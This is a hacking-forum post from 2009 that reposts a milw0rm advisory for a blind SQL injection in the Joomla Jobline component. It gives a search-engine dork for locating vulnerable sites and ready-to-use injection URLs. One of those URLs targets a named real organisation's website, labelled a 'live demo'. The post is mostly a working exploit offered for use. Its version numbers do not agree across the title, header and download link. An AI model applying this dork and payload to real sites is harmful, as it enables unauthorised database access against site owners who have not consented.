Multi Ethnic Hacking Group


    Joomla Component Jobline <= 1.3.1 Blind SQL Injection Vulnerability

    Share
    avatar
    Foxi
    Admin

    Posts : 92
    Reputation : -1
    Join date : 2009-07-08

    Joomla Component Jobline <= 1.3.1 Blind SQL Injection Vulnerability

    Post by Foxi on Thu Jul 23, 2009 4:23 am

    Code:
    ##################################################
    # Joomla Component: Jobline <= 1.1.3.1 (search) / Blind SQL Injection Vulnerability
    # Download: http://joomlacode.org/gf/download/frsrelease/3721/8325/jobline-1_1_2_2.zip
    # Dork: inurl:"index.php?option=com_jobline"
    #  ---> magic_quotes_gpc =Off
    # ==================================
    # {Author}: ManhLuat93
    # {My HomePage}: http://manhluat.com/
    ##################################################

    Live Demo: http://www.ntca.org/index.php?option=com_jobline&task=results&Itemid=&search=

    [-] Exploit [+]

    [--] http://localh0st/index.php?option=com_jobline&task=results&Itemid=&search=%' and substring(@@version,1,1)=5 and '%'='

    [++] http://www.ntca.org/index.php?option=com_jobline&task=results&Itemid=&search=%' and substring(@@version,1,1)=5 and '%'='


    note:
    <name>Jobline</name>
    <creationDate>08 Jan 2008</creationDate>
    <version>1.3.1</version>
    <joomlaVersion>1.5</joomlaVersion>
    <copyright>(c) 2006 Olle Johansson</copyright>
    <license>GNU GPL</license>


    # milw0rm.com [2009-07-17]


      Current date/time is Fri Mar 24, 2017 5:56 pm